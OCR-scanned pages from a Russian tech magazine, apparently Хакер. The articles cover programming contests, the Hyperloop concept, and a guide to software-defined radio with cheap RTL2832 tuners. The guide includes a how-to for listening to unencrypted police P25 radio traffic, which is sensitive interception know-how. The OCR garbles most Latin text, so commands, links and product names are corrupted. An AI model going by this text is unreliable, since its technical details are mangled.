ный браузер ( рігаіоЬгоѵѵзог.сог : ). По сути, разработка 
не что иное, как портативный РігеФх для доступа к Тог 
плюс ряд надстроек. Пока браузер доступен только 
для ѴѴіпсіоѵѵз. 







Неасіег 
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За последний месяц я оказался сразу на двух 
соревнованиях, где состязались программи- 
сты. И это были настолько разные форматы, 
что о каждом стоит рассказать подробно. 




КОЛОНКА 

СТЁПЫ 

ИЛЬИНА 



СПОРТИВНОЕ ПРОГРАММИРОВАНИЕ 

РасеЬоок устраивает Наскег Сир. Ежегодно проводится Ооодіе Сосіе бат. 
Чем хуже наши компании? Ничем! Яндекс растит чемпионат по программиро- 
ванию с незатейливым названием Яндекс. Алгоритм, финал которого прошел 
в конце августа в Питере. 

По формату это похоже на спринт для программистов. За сто минут необ- 
ходимо решить шесть задач. Решить все — безумно сложно, поэтому важно 
с ходу выделить наиболее простые, чтобы начать с них. Есть суперсложные 
«гробы», их, как правило, решает один участник или вообще никто. Совсем 
простых задач нет — в финале они уже не нужны. У каждого есть любимые 
темы. Кто-то любит задачки на графы, кто-то — на комбинаторику, кто-то — 
на теорию чисел. 

Но это не единственный элемент тактики. Ян деке. Ал го ритм интересен 
правилами, которые позволяют использовать разные стратегии. Все задания 
стоят одинаковое количество очков, но бонус зависит от того, как отправлять 
решения. Задачи можно сдавать «в открытую» (проверочная система сразу 
отвечает, «прошла» задача или нет). А можно послать ее «втемную» и узнать 
результат только в конце соревнований. Риск оплачивается большим количе- 
ством очков, и игроки готовы на него идти. 

Соревнование проходит в несколько этапов. Всего зарегистрировалось 
более 3000 человек из 84 стран мира. В офлайновый финал, который про- 
ходил в Питере, вышло 25 человек из 8 разных стран. Главная интрига заклю- 
чалась в борьбе между одним из трех золотых финалистов ИТМО Геннадием 
Короткевичем (талантливый первокурсник, который уже в школе показывал 
невероятные результаты) и Петром Митричевым из Ооодіе (про Петю скла- 
дываются легенды ;)). Оба занимают топовые позиции в рейтинге Тор Собес 
Победителем, впрочем, стал Геннадий Короткевич, а Митричев не попал 
в тройку. 

Участники очень сильно натренированы решать такие задачки, хотя сами 
признаются, что в реальной работе они попадаются в лучшем случае раз 
в месяц. Но люди именно с такими скиллами могут выстраивать эффектив- 
ную работу с Ьід баіа, разрабатывать компьютерное зрение, алгоритмы сжа- 
тия, заниматься наукой. И это очень круто. 

Кстати, такие соревнования не только Тип. Это и дополнительный финан- 
совый стимул. Например, победитель «Алгоритма» получает 300 тысяч ру- 
блей. Если ездить и выигрывать соревнования круглый год, выходит неплохая 
прибавка к зарплате :). 




СОЗДАЙ П РОДУКТ ЗА 24 ЧАСА 

Хакатон — это совсем другой формат. Здесь не нужно знать алгоритмы, 
но надо уметь работать в команде и делать настоящие продукты. Особенно 
хорошо, если это у тебя получается быстро, — на все отводится 24 часа. 

В начале сентября прошел российский этап хак-марафона РауРаІ ВаШе 
Наск (ЬаНІеНаск.огд/тозсоѵѵ) — нон-стоп событие, в котором могут участво- 
вать все, кто хочет создавать продукты. Молодые предприниматели, дизайне- 
ры и, самое главное, программисты :). Здесь уже нет искусственных и тщатель- 
но проработанных задач. Есть цель — создать веб- или мобильный продукт, 
решающий проблемы больших городов. А что это будет — нужно придумать 
как раз самим. К услугам любые стеки технологий, любые АРІ разных сервисов 
(в том числе, естественно, организатора — РауРаІ), любые вспомогательные 
средства. Лишь бы в результате получился работающий прототип. Многие 
приходят на хакатон уже со своей командой (еще до мероприятия на разных 
сайтах можно было найти топики, в которых кто-то рассказывал о своей идее 
в поиске единомышленников для реализации на хакатоне). Однако есть и те, 
кто формирует команды прямо на месте — в этом, наверное, есть особый фан. 
Хотя шансов на победу в последнем случае, как мне кажется, меньше. 

Как это выглядит? Утром первого дня участники получили время для об- 
щения и формирования команд, после чего представили 38 идей (в работу 
пошли только 21 ). Программировать все команды начали в одно и то же время 
и получили 24 часа в свое распоряжение. Работа над кодом шла с полудня 
субботы — всю ночь и всю первую половину следующего дня. 

Я приехал к полудню воскресенья, не выспавшись. Но когда увидел 
парней, которые всю ночь кодили, поддерживая себя Веб ВиІІ’ом, понял, 
что жаловаться мне не на что :). Было приятно встретить среди участников 
нескольких знакомых людей. Состоявшихся профи, но заражающих энтузи- 
азмом и энергией людей — пример того, что участвовать в хакатонах никогда 
не поздно. 

Победителем московского этапа РауРаІ ВаіІІе Наск стал проект ТаІкіпдСИу. 
Парни создали настоящий городской навигатор для слепых и слабовидящих, 
за что получили главный приз — оплаченное участие в мировом финале в Си- 
ликоновой долине и шанс для команды стать одним из десяти счастливчиков, 
которые выиграют 100 тысяч долларов. 

Может, в следующем хакатоне поучаствую и я :). Главное — не стать без- 
дельником, которые есть в любой команде. А для этого неплохо бы не расте- 
рять скилл в программировании. СС 
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ТРАНСПОРТИРОВКА ЛЮДЕЙ ПО ТУННЕЛЮ 
СО СКОРОСТЬЮ 1200 КМ/Ч 



ЧТО ЭТО ТАКОЕ 

Нурегіоор ( зрасех.сот/і'іѵрегіоор ) — концепту- 
альный проект нового типа общественного транс- 
порта, способного перевозить людей на большие 
расстояния на скорости около 1220 км/ч, что пре- 
вышает скорость пассажирских самолетов и при- 
мерно соответствует скорости звука в воздухе. 

Автор концепции Элон Маек, владелец ком- 
паний Тезіа МоФгз и ЗрасеХ, известен своими 
инновационными идеями и изобретениями. Бо- 
лее того, он успешно воплощает их в жизнь, Маек 
ставит Нурегіоор в один ряд с четырьмя другими 
видами транспорта: автомобильным, железнодо- 
рожным, водным, воздушным. Если идею удастся 
реализовать, то капсулы Нурегіоор станут пятым 
видом транспорта в этом списке. 

Изобретатель опубликовал «альфа-версию» 
дизайна Нурегіоор ( яМѵ/ 1 7ЖІю а) с техниче- 
скими спецификациями туннеля и транспортных 
капсул, экономические расчеты для строитель- 
ства и эксплуатации системы. Элон Маек пред- 
лагает заинтересованным специалистам взять 
этот проект за основу, доработать детали и до- 
вести до стадии коммерческой эксплуатации. 
Он считает, что Нурегіоор может стать настоя- 
щим краудсорсинговым ореп зоигсе проектом, 
который будет создаваться силами широкого 
сообщества. 

ЗАЧЕМ ЭТО НУЖНО 

Транспортные капсулы по скорости сравнимы 
с самолетами, по удобству посадки — с поезда- 



ми. При этом они, в идеале, безопаснее, эффек- 
тивнее и не зависят от погодных условий. Элон 
Маек уверен, что транспортные туннели могут 
быть даже гораздо экономичнее, чем любой дру- 
гой транспорт. По его расчетам, проект туннеля 
между Сан-Франциско и Лос-Анджелесом дли- 
ной 570 + 570 км окупится за 20 лет при стоимости 
билета в 20 долларов, если не учитывать эксплуа- 
тационных расходов. 

Нурегіоор полностью обеспечивает себя 
электроэнергией благодаря покрытию всей тру- 
бы солнечными панелями. Для работы требует- 
ся 21 МВт, а панели выдадут 57 МВт в солнечный 
день. 

Капсулы вместимостью 28 пассажиров можно 
отправлять со станции каждые 30 с. Это позво- 
лит перемещать между теми же Сан-Франциско 
и Лос-Анджелесом до 7,4 миллиона человек в год 
в каждую сторону. По мнению Маска, новый вид 
транспорта лучше всего подходит для соедине- 
ния парами туннелей густонаселенных мегаполи- 
сов, находящихся на расстоянии до 1500 м. В СНГ 
идеальными маршрутами были бы Москва — 
Санкт-Петербург (635 км по прямой), Москва — 
Киев (757 км), Москва — Екатеринбург (1418 км). 
Максимальная скорость 1220 км/ч между Сан- 
Франциско и Лос-Анджелесом достигается 
при ускорении не более 0,5д для комфорта пасса- 
жиров. В городской черте капсулы будут двигать- 
ся относительно медленно: разгон до 480 км/ч 
в первые 167 с. Расчетное время в пути на марш- 
руте 570 км составит 2134 с (35 мин). 



КАК ЭТО РАБОТАЕТ 

Капсулы Нурегіоор двигаются в разреженном 
воздухе, рабочее давление в туннеле — 100 Па, 
то есть почти вакуум. Ускорение капсул осу- 
ществляется с помощью магнитных ускорителей 
в туннеле и роторов на каждой капсуле. Рассто- 
яние между ними в 20 мм сохраняется благода- 
ря электромагнитному полю, а также воздушной 
подушке, нагнетаемой компрессорами на крей- 
серской скорости. Компрессоры заодно созда- 
ют разрежение перед капсулой, втягивая воздух 
внутрь (рис. 2). Для движения на малых скоростях 
перед высадкой пассажиров есть колеса. 

К сожалению, для успешной реализации 
проекта предстоит решить еще множество тех- 
нических проблем, одна из главных — тепловое 
расширение трубы. Например, при увеличении 
температуры на 40 °С металлическая труба 500 км 
удлинится примерно на 300 м. В обычных трубо- 
проводах проблему решают 11-образными встав- 
ками, которые амортизируют тепловое расши- 
рение по всей длине трубы. В железнодорожном 
транспорте между шпалами оставляют зазоры, 
из-за которых колеса вагонов издают характер- 
ный стук. В транспортном туннеле такие варианты 
не пройдут, потому что капсулы с людьми должны 
двигаться по прямой и не могут резко повернуть 
на 90’, да и зазоры не оставишь из-за низкого 
давления. 

Будем надеяться, что эти проблемы скоро 
удастся решить, и тогда можно будет прокатиться 
из Москвы в Питер за 39 минут. ДЕ 




Рис. 1 . Модель Нурегіоор в программе 
ЗО-моделирования 



Рис. 2. Расчет обтекания капсулы воздухом с втя- Рис. 3. Модель туннеля на платформах с покрытием 

гиванием через компрессор на скорости, близкой крыши солнечными панелями 

к скорости звука 




Рис. 4. Рендеринг концептуального дизайна транс- 
портной капсулы с открытыми дверями на станции 



Рис. 5. Рендеринг концептуального дизайна транс 
портной капсулы 



Рис. 6. Транспортная капсула с пассажирами 
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КАК СЛУЧИЛАСЬ НАСТОЯЩАЯ РАДИОРЕВОЛЮЦИЯ 

Радио на софтварном уровне — потрясающе перспективная штука, дающая 
почти неограниченную свободу для анализа сигнала и взаимодействия с ра- 
диоустройствами. Еще совсем недавно это удовольствие было доступно лишь 
избранным, но сейчас вокруг ЗЭР формируется огромное комьюнити любите- 
лей и профессионалов. 




Коллективный 

разум 






ойѵѵаге сМіпесІ гасііо, как нетрудно догадаться, — это 
такой вариант конструкции радиоприемника, при кото- 
ром часть его реализована программным образом. ЗОВ 
позволяет отказаться от идеи создания узкоспециализирован- 
ных хардкорных приемопередатчиков из рассы пухи и крепкого 
матерного слова и использовать для большей части обработки 
сигналов СРЦ обычного компа и РРОА/СРЮ на плате. 

Типичная схема: «в железе» реализован усилитель радио- 
сигнала с антенны, перестраиваемый фильтр (грубо «выреза- 
ющий» нужный диапазон частот) и квадратурный демодулятор, 
который точно вырезает «кусочек» эфира, начиная с нужной 
частоты в виде I- и О-потоков. Эти потоки оцифровываются 
АЦП — и отправляются в компьютер на дальнейшую обработку. 

Отличие между потоками I и О в том, что они сдвинуты 
по фазе на 90 градусов и позволяют при последующей обра- 
ботке из сигнала получить как амплитудную, так и фазовую со- 
ставляющую. Например, для прослушивания АМ- радио было 
бы достаточно и одного (любого) потока, а вот РМ без инфор- 
мации о фазе без существенных потерь качества не декодиро- 
вать. 

Частота дискретизации потоков I и О ограничивает ширину 
радиоэфира, которую будет одновременно видно на компью- 
тере. В случае ПИ2832 это, в зависимости от настроек, от 0,25 
до 3,2 МГц. 

Программное обеспечение на компьютере, получив потоки 
I и О, может в реальном времени декодировать радиопереда- 



чу из любого участка диапазона в любом из поддерживаемых 
стандартов модуляции (АМ, РМ и их вариации) или просто 
слить весь эфир в файл. 

Сама концепция ЗйП существовала достаточно давно. Вот 
только до последнего времени, если ты хотел этим занять- 
ся, у тебя было два варианта: для «совсем маленьких» или же 
для «совсем взрослых». Первым можно было предложить ПИ- 
ЗОН за 30 баксов. Это целое семейство китайских ТѴ-тюнеров 
на основе микросхемы ПТІ_2832, в которых внезапно™ была об- 
наружена функциональность универсального ЗОП-приемника. 
Второй вариант — семейство ІІЗПР, профессиональных тран- 
сиверов от компании Ейиз Везеагсіі, стоимость которых начи- 
нается с 700 долларов. Используется, например, для развора- 
чивания базовых станций ОЗМ с помощью ОрепВТЗ. 

Тем не менее именно первый, «детский» вариант привел 
к тому буму интереса к ЗЭП, который мы видим сейчас. Понят- 
но, что китайский ТВ -тюнер не отличается точностью и мощ- 
ностью. Понятно, что работает он только на прием. Но на его 
основе умельцы ухитрялись делать самые интересные штуки. 
И это было первым шагом. 

А следующим шагом стали доступные девайсы с возможно- 
стью передачи и расширенным диапазоном частот. Потенциал 
огромный: программирование радиодевайсов, анализ лю- 
бых сигналов, от любительского радио до высокоскоростных 
1Л"Е-сетей, Мы еще только вступаем в этот дивный новый мир. 
Но точно будет интересно. ЗС 
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Первое поколение доступных трансиверов 

2013 год замечателен тем, что у любителей ЗОВ наконец-то появился выбор, 
а не просто метания от 20-долларового ВТЬ-ЗОВ к 700-долларовому ІІ5ВР. 
Сразу несколько девайсов позволяют подобрать трансивер под конкретную 
задачу. Давай посмотрим на сильные и слабые стороны каждого. 




Тауіог КШіап 

ѵтѵу.іауіогкііііап.сот 
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НДСКПР 

Самое доступное полноценное ЗОН. Это уже 
не первый удачный продукт Майкла Оссмана, 
в прошлом выпустившего первый бюджетный 
ВІие*оо1б-снифер ІІЬегІооІб (см. статью «Ха- 
керский чемоданчик» в августовском «Хакере» 
за прошлый год). Майкл уже провел успешную 
кампанию на КіскзІаПег, собрав на производство 
НаскВР около 600 тысяч долларов. Первые 500 
предпродажных образцов уже были выданы бета- 
тестерам, и на основе их отзывов будут исправле- 
ны недочеты в финальном продукте. 

НаскПР’у из коробки доступен достаточно 
широкий диапазон частот, от 30 МГц до 6 ГГц, 
что сравнимо с более дорогими устройствами 
из семейства ІІ5НР {50 МГц — 6 ГГц). Частота 
дискретизации составляет 20 МГц. Это значит, 
что с помощью приемника можно будет анализи- 



ВІ.АОЕНР 

Еще один успешный проект с Кіскзіагіег’а. 
ВІабеНР работает с меньшим по сравнению 
с НаскВР диапазоном частот, от 300 МГц до 3,8 
ГГц, так что 5-гигагерцовый ѴѴі-РІ-сигнал ему не- 
доступен. Также ведется работа над дополни- 
тельной платой, которая должна позволить прием 
сигнала на частоте от 10 МГц. 

Отличительная особенность ЫасіеПР — воз- 
можность работы в режиме полного дуплекса. 
По сравнению с НаскВР данный приемник имеет 
большую частоту дискретизации (28 МГц), боль- 
шую разрядность АЦП (12 бит) и поддержку ЦЗВ 
3.0. С использованием КЗВ 3 в ЗОВ-приемниках 
связаны определенные опасения, так как это мо- 
жет вносить помехи на частоте 2,4 ГГц, поэтому 
ЫасІеНР поставляется с дополнительным экрани- 
рованием чувствительных элементов. 



ровать, например, ѴѴі-Рі-сигнал на частоте 5 ГГц 
и высокоскоростные І_ТЕ- передач и. В более доро- 
гой комплектации идет конвертер Нагл II Эр, с по- 
мощью которого можно будет улавливать сигнал 
на частоте от 300 кГц. 

Среди недостатков можно отметить то, 
что НаскВР работает только в режиме полудуплек- 
са, то есть в один момент можно либо отправлять, 
либо принимать сигнал. Для переключения между 
режимами каждый раз придется отправлять соот- 
ветствующую команду, что может добавить неже- 
лательную задержку. Однако при желании можно 
объединить два приемника и получить поддержку 
полного дуплекса. Также, в отличие от ЫасіеВР 
и более дорогих ЭЗВР, НаскВР использует ЭЗВ 2, 
а не ЦЗВ 3, Кроме того, в НаскВР используется 
8-битный АЦП (у ЫабеВР — 12 бит), что негативно 
сказывается на точности срабатывания. 





















іімтпх 

Устройство от Раігѵѵаѵез не вписывается в обзор по цене, но достойно 
упоминания просто потому, что было разработано российской коман- 
дой, Это единственный полноценный (не МІМО) двухканальный при- 
емопередатчик в этом обзоре, В качестве радиочипов используются два 
чипа І.М560020, поэтому частотный диапазон и разрядность ЦАП/АЦП 
полностью совпадают с ЫасІеВР, использующим тот же чип, Трансивер 
разрабатывался с большим фокусом на телеком, поэтому и частота дис- 
кретизации совпадает с таковой у Ѳ5М и составляет 13 МГц. Заменой 
опорного генератора можно довести частоту дискретизации до 20 МГц, 
а в будущих версиях ІітТНХ — до 40 МГц. Кроме стандартной прошивки, 
есть прошивка, поддерживающая четыре канала приема без передачи. 

Кроме двухканальн ости, отличительная черта ІІтТНХ — это индустри- 
альное исполнение, использование «взрослого» ІСЬ ЕІГіегпеі вместо 
115В и наличие на борту приемника СРВ — для обеспечения высокой точ- 
ности опорного генератора, требуемой для таких стандартов, как СВМ. 
Всеми этими наворотами и объясняется высокая цена устройства. 





Ц8НРВ1005ТАВТЕН/В200 

Сразу два устройства в семействе ІІ5ВР можно приобрести 
по одной и той же цене. При этом В100 значительно уступает 
более дешевым НаскРР и ЫабеВР. Ему доступен диапазон ча- 
стот от 50 МГц до 2,2 ГГц, а частота дискретизации составляет 
16 МГц. При этом для подключения в В 100 используется ІІЗВ 2. 
В обеих моделях доступен режим полного дуплекса. 

В200 работает с более широким диапазоном частот, от 50 
МГц до 6 ГГц. Частота дискретизации составляет 61,44 МГц. 
Для подключения в В200 используется СІЗВ 3. Более дорогая 
( 1100 долларов) версия В210 оснащена двумя передатчиками. 

Сильная сторона ГІЗВР заключается в том, что эти продукты 
существуют на рынке с 2006 года и за это время успели обрасти 
огромным количеством стороннего софта и наработок. 

ВЫВОД 

Будущее 5йВ выглядит как никогда позитивно: на рынок 
выходит сразу несколько доступных трансиверов. НаскПР, 
благодаря своей цене, возможностям и открытости, станет 
хорошим выбором для начинающих пользователей. Более 
мощный ЫабеПР с его навороченным РРСА и поддержкой 
ЫЗВ 3 лучше подойдет для автономных проектов, ну а много- 
функциональные ІІЗНР В 100 и В200 вплотную приближают 
любительский сегмент рынка к «взрослым» решениям уров- 




АЦП, скорость 
преобразования 



Интерфейс 

подключения 



РРСА 



Дата выхода 
в продажу 

Цена 



Диапазон частот 
Частота 

дискретизации 

Дуплекс 



АЦП, разрядность Збит 



НаскПР 


ЫасІеНР 


ІІ5ПР В100 Зіагіег 


Ц5ПРВ200 


ЦтТПХ 


30 МГц — 6 ГГц 


300 МГц — 3,8 ГГц 


50 МГц -2,2 ГГц 


50 МГц — 6 ГГц 


300 МГц -3,8 ГГц 


20 МГц 


28 МГц 


16 МГц 


61 ,44 МГц 


2 канала по 13 МГц 
(до 40 МГц) 


полу 


полный 


полный 


полный 


полный + 2 канала 


8 бит 


12 бит 


12 бит / 14 бит 


12 бит 


12 бит 


20 миллионов 
отсчетов 
в секунду 


40 миллионов 
отсчетов в секунду 


64/128 миллионов 
отсчетов в секунду 


61,44 миллионов 
отсчетов в секунду 


2 канала по 13 
миллионов отсчетов 
в секунду (до 40 
миллионов отсчетов 
в секунду) 


115В 2 Н5 


ЬІЗВЗ 


115В 2 Н5 


115В 3 


ІСЬ ЕіЬегпе* 


отсутствует 


40/115 тысяч 

логических 

элементов 


25 тысяч логических 
элементов 


75 тысяч логических 
элементов 


75 тысяч логических 
элементов 


1.РС43ХХ 


Сургезз РХЗ 


Сургезз РХ2 


Сургезз РХЗ 


отсутствует 


январь 2014 года 


уже продается 


уже продается 


уже продается 


уже продается 


300$ 


420/650 $ 


675$ 


675$ 


1500$ 
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Уверен, для многих из вас, как и для меня совсем недавно, происходящее 
в радиоэфире было настоящей магией. Мы включаем телевизор или радио, 
поднимаем трубку сотового телефона, определяем свое положение на карте 
по спутникам ОРЗ или ГЛОНАСС — и все это работает автоматически. Благо- 
даря РТЬЗОР у нас появился доступный способ заглянуть внутрь всего этого 
волшебства. 



Михаил Сваричевский 



I ак уже говорилось, ПТ1_-80Н — это целое семейство 

дешевых ТВ-тюнеров, способных выполнять функ- 
■|\|\ цию ЗЭП-приемника. У этих игрушек разные на- 
Х И звания и бренды, но объединяет их одно — все они 
построены на чипсете ПИ2832. Это микросхема, содержащая 
два 8-битных АЦП с частотой дискретизации до 3,2 МГц (одна- 
ко выше 2,8 МГц могут быть потери данных), и интерфейс 115В 
для связи с компьютером. Эта микросхема на входе принимает 
I- и О-потоки, которые должны быть получены другой микро- 
схемой. 

Р820Т и Е4000 — это две наиболее удобные для 5ЭП микро- 
схемы, реализующие радиочастотную часть ЗЦР: усилитель 
антенны, перестраиваемый фильтр и квадратурный демодуля- 
тор с синтезатором частоты. На рисунке — блок-схема Е4000. 

Разница между ними следующая: Е4000 работает в диа- 
пазоне -52-2200 МГц и имеет немного большую чувствитель- 
ность на частотах менее 160 МГц. Из-за того что производитель 
Е4000 обанкротился и микросхема снята с производства, оста- 
ющиеся тюнеры покупать все труднее, и цены на них растут. 

В820Т работает в диапазоне 24-1766 МГц, однако диапазон 
перестройки внутренних фильтров сильно затрудняет работу 
Н820Т выше 1200 МГц (что делает невозможным, например, 
прием СРЗ). На данный момент тюнеры на этой микросхеме 
легко купить, и стоят они около 10-11 долларов. 

Также продаются тюнеры на микросхемах РС0012/РС0013/ 
РС2580 — у них очень серьезные ограничения по частотам ра- 



Типичный 
приемник на ос- 
нове НТ1.2332 — 
ЕгТѴббВ 



боты, и лучше их не покупать. Узнать, на какой микросхеме сде- 
лан тюнер, можно в описании товара или спросив у продавца. 
Если информации по используемым чипам нет — лучше купить 
в другом месте. 

ПОКУПКА 

В розничных магазинах их не найти, поэтому нам поможет 
аііехргезз.сот . Пишем в поиске Р820Т или Е4000, сортируем 
по количеству заказов, внимательно читаем описание (там 
должно быть явно написано, что тюнер использует микросхе- 
мы ВТІ.2832 + Е4000 или РГП2832 + В820Т), и можно заказы- 
вать. Присылают обычно почтой России, в течение 3-6 недель. 

В комплекте с тюнером будет и крошечная антенна — ее, 
конечно, лучше заменить. Хорошие результаты можно полу- 
чить, используя обычную комнатную телевизионную антенну 
МВ-ДМВ «рога». В описании товара также нужно обратить вни- 
мание на разъем антенны — и либо искать тюнер с обычным 
телевизионным разъемом, либо расчехлять паяльник и делать 
переходник / перепаивать разъем. При пайке очень легко убить 
устройство статическим электричеством, так что заземляйся. 

На многих тюнерах рядом с коннектором антенны отсут- 
ствуют защитные диоды (в данном случае Ц7) — их можно либо 
впаять самому (один к земле, один от земли — я, например, 
впаял 1Ш148), либо оставить как есть, только антенну голыми 
руками не трогать и всячески беречь от статического электри- 
чества. 
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ски — раньше к компьютеру подключали аналоговые приемни- 
ки. Со временем декодеры дописывают, чтобы они напрямую 
работали с РТ1_-50Р. 



ВТУЗОВ 

Р11_зс1г — драйвер, обеспечивающий «нецелевое» использо- 
вание данных с ТѴ-тюнеров на базе РИ2832. В Мпсіоѵѵз тебе 
придется заменить драйвер тюнера по умолчанию на \Л/іпІІ5В 
с помощью программы 2абід. 

Ріізсіг.сііі требуют все ЗОР-программы, и зачастую эта ЭІЛ 
уже идет в поставке софта, использующего РТ1.2832. 

Р1І_зсІг также можно использовать и через консольную 
утилиту, чтобы протестировать тюнер или слить кусок эфира 
в файл: 

ГЫ 5СІг - -р 1575520000 -§ 34 - 5 2Ѳ48Ѳ00 оиі: - сіаф 

При дальнейшей обработке нужно помнить, что в файле 
байты I- и О-потоков идут поочередно. 

80В8НАВР 

ЗЭРЗбагр ( лГІу/1'г2е8Рѳ) — одна из популярных и простых 
в использовании программ подѴѴіпбоѵѵз для работы с РТІ-2832 
{и некоторыми другими ЗОВ), При старте нужно выбрать 
РТ1.2832, нажав на кнопку Ргопі-епсі. Вводить частоту руками 
нужно в поле Сепіег. 

Слева вверху — выбор типа демодулирования. РМ исполь- 
зуется для обычного РМ-вещания и аудио в аналоговом теле- 
видении, АМ — в радиостанциях на низких частотах и для пере- 
говоров самолетов, МРМ — в рации. 

Многие внешние декодеры цифровых передач работа- 
ют через «аналоговый» интерфейс — то есть ты запускаешь 
ЗЭРЗбагр, устанавливаешь программу Ѵіііиаі Аисііо СаЫе ( Ьіі. 
І ѵ/ІсРібТХ . программа платная), настраиваешь ЗОРЗііагр, 
чтобы он декодированный звук выводил в ѴАС, и в системных 
настройках ѴѴіпсіоѵѵб указываешь ѴАС как устройство записи 
по умолчанию. В результате внешняя программа-декодер будет 
получать звук от ЗРРЗйагр. 

Таким образом подключаются декодеры Р25-раций (поли- 
ция), данных с метеоспутников, пейджеров, навигационных со- 
общений самолетов (АйЗ-В) и многого другого (об этом ниже). 
Такой необычный способ подключения сложился историче- 



сішпаоіо 

ОРЮ Рабіо ( )іТІѵ/1 3Ьа 6с21 — настоящий зубр ЗОР. Это про- 
граммный пакет, предназначенный для обработки данных, 
полученных от ЗЭР-приемника, в реальном времени. Являю- 
щаяся стандартом де-факто для всех более-менее профес- 
сиональных забав в области радио, программа построена 
на модульной основе с учетом парадигмы ООП. Это настоящий 
радиоконструктор, в котором роль элементов отведена функ- 
циональным блокам: фильтрам, модуляторам/демодуляторам 
и несметному множеству других примитивов обработки сиг- 
налов. Таким образом, имеется возможность составить из них 
практически любой тракт обработки. Делается это в прямом 
смысле слова в несколько кликов мышкой в наглядном графи- 
ческом редакторе, имя которому дпигабіо-сотрапіоп. Более 
того, дпигабіо-сотрапіоп написан на РуІІіоп и позволяет гене- 
рировать схемы на РуШоп. Но у такой гибкости есть и обратная 
сторона — освоить ОЫІІ Рабіо за десять минут невозможно. 
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Прием переговоров по рации на частоте 446 МГцв ЗОРЗЬагр 




РАСШИРЕНИЕ ДИАПАЗОНА ПОДДЕРЖИВАЕМЫХ 
ЧАСТОТ 

Ниже -52 МГц / 24 МГц находится большая часть интересного 
в радиоэфире — поэтому ограничение по минимальной часто- 
те серьезно сужает возможности этих приемников. Расширить 
диапазон можно, купив цр-сопѵегіег, который сдвинет сигнал 
с антенны на 100 или 125 МГц вверх. Среди продающихся кон- 
вертеров пока лучше всех себя показывает КІооЕІес — Наш II Іір 
ѵі.2 с кварцем на 125 МГц. Использование кварца на 125 МГц 
очень важно, так как в районе 100 МГц находится много мощных 
РМ -станций и без очень качественного экранирования всех ча- 
стей системы они будут мешать приему. 

Этот конвертер можно использовать с любыми ЗЭР- 
системами, в том числе и работающими на передачу (есть огра- 
ничение на мощность), 

Для приема на частотах менее 50 МГц придется больше 
внимания уделить антенне, так как габариты ее растут про- 
порционально увеличению длины волны. Конструкций антенн 
для любительской радиосвязи в КВ-диапазоне очень много, 
но в самом простейшем случае — это спускаемый с балкона 
провод длиной 5-20 м. 

МАЛО ШУМЯЩИЙ УСИЛИТЕЛЬ 

И Е4000, и Р820Т — кремниевые микросхемы, и усилитель вну- 
три них шумит сильнее, чем более дорогие отдельные СаАз- 
усилители. Для снижения уровня шумов (на 1,5-3 дБ) и улучше- 
ния возможностей приема очень слабых сигналов можно купить 
малошумящий усилитель, который включается между антенной 
и тюнером. Один из вариантов — ІФІА Іог аІІ ( Ьі1Іу/18РІіР8с ). 
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РАДИОПЕРЕГОВОРЫ 
В БЕЗЛИЦЕНЗИОННЫХ ДИАПАЗОНАХ 

Гражданские рации, не требующие регистрации в России, ра- 
ботают на частотах 433 и 446 МГц. Впрочем, в Москве русскую 
речь там уловить сложно. Их сразу и без проблем слышно 
в ЗОПЗИагр, модуляция ЫРМ. 

Поскольку каналов много, очень полезен плагин 
для ЗРНЗІтагр АіДоТипег РІидіп {Ьі-.іѵ/ 177;1эКС) — он автомати- 
чески включает частоту, на которой ведется передача, и таким 
образом можно слушать сразу все каналы раций. 

Чтобы слушать рации на частоте 27 МГц, нужен тюнер с микро- 
схемой В820Т или внешний конвертер в случае Е4000 (например, 
тот же Налп 11 ІІр ѵі .2). Оптимальная антенна для 27 МГц уже тре- 
буется более серьезная, длиной ~2,59 или -1,23 м. 

РАДИОПЕРЕГОВОРЫ ПОЛИЦИИ 

Полиция в Москве и во многих других регионах России перешла 
на использование цифровых радиостанций, работающих в стан- 
дарте АРСО-25 (Р25). В Р25 данные передаются в цифровом 
виде со сжатием и кодами коррекции ошибок — это позволяет 
увеличить дальность устойчивой связи и больше каналов впих- 
нуть в ту же полосу радиочастот. Также существует опциональ- 
ная возможность шифрования переговоров, однако обычная по- 
лиция работает без шифрования. 

Для приема Р25-раций можно использовать декодер 030 
( Ьіі:,і ѵ/ 14 і_ 9 пп 5 ) . 050 ожидает аудиоданные на входе. Перена- 
править аудио с ЗРНЗІіагр в 050 можно с помощью Ѵігіиаі Аибіо 
СаЫе. ЭЗР весьма критичен к настройкам ЗОНЗЬагр — я реко- 
мендую устанавливать АР Оаіп около 20-40%, возможно отклю- 
чать галочку РіИег Аибіо. Если все идет по плану — в окне 030 
побегут декодированные пакеты, а в наушниках будут слышны 
переговоры. Эта схема также работает с упомянутым плагином 
АиІоТипег в ЗОПЗІіагр. Найти частоты предлагаю читателям са- 
мостоятельно, так как эта информация не является открытой. 

РАДИОЛ ЕРЕГОВОРЫ САМОЛЕТОВ И ДИСПЕТЧЕРОВ 

По историческим причинам для радиосвязи в авиации исполь- 
зуется амплитудная модуляция. Обычно передачи с самолетов 
лучше слышно, чем от диспетчеров или погодных информаторов 
на земле. Диапазон частот — 117-130 МГц. 

ПРИЕМ СИГНАЛОВ С АВТОМАТИЧЕСКИХ ПЕРЕДАТЧИ- 
КОВ САМОЛЕТОВ А05-В 

АРЗ-В используется для того, чтобы и диспетчер, и пилот ви- 
дели воздушную обстановку. Каждый самолет регулярно пере- 
дает параметры полета на частоте 1090 МГц: название рейса, 
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ЙР- конвертер 
МооЕІес — Наш 
ІПІрѵІ.2 
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высота, скорость, азимут, текущие координаты (передаются 
не всегда). 

Эти данные можем принять и мы, чтобы лично наблюдать 
за полетами. Два популярных декодера АЭЗ-В для ПТЕ2832 — 
АОЗВ# ( Ы1.[у/17РЦСі0іа ) и РПЫОЭО. Я использовал АОЗВ#. 
Перед запуском желательно настроиться на 1090 МГц 
в ЗОПЗІіагр, посмотреть, есть ли сигнал и какая ошибка часто- 
ты из-за неточности кварцевого генератора. Эту ошибку необ- 
ходимо скомпенсировать в настройках Ргопі-епб’а: Ргециепсу 
соггесйоп (ррпл). Нужно помнить, что величина этой ошибки 
может изменяться вместе с температурой приемника. Найден- 
ную коррекцию нужно указать и в окне АОЗВ# (предварительно 
закрыв ЗОПЗІіагр). 

Оптимальная антенна-монополь для 1090 МГц получается 
длиной всего 6,9 см. Так как сигнал очень слабый, тут очень же- 
лательно иметь дипольную антенну, установленную вертикаль- 
но с такой же длиной элементов. 

АОЗВ# декодирует пакеты и ждет подключений по сети 
от клиента, отображающего воздушную обстановку. В каче- 
стве такого клиента мы будем использовать абзЬЗСОРЕ (Ьіі, 
іѵ/іріі !7гі( 1 
